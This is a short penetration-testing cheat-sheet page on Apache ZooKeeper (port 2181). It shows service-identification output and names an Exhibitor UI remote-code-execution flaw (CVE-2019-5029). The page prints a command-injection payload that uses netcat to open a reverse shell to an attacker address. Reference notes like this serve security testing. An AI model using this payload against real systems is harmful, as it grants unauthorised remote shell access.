2181 - ZooKeeper

Apache ZooKeeper is a centralized service designed to manage configuration, naming, synchronization, and coordination in distributed systems. It helps multiple nodes in a cluster maintain consistent state and coordinate actions, ensuring reliability and fault tolerance in complex environments. By default, ZooKeeper listens on TCP port 2181, which is used for client connections to the service and inter-node communication within the cluster.

RCE

# Identify ZooKeeper
PORT      STATE SERVICE     VERSION
2181/tcp  open  zookeeper   Zookeeper 3.4.6-1569965 (Built on 02/20/2014)

ZooKeeper Exhibitor's UI (1.0.9 to 1.7.1) has a RCE vulnerability (CVE-2019-5029) with an available PoC:

# Payload
$(/bin/nc -e /bin/sh 192.168.45.236 80 &)

Previous1978 - WiFi Mouse Next3632 - DISTCC

Last updated 1 month ago

Was this helpful?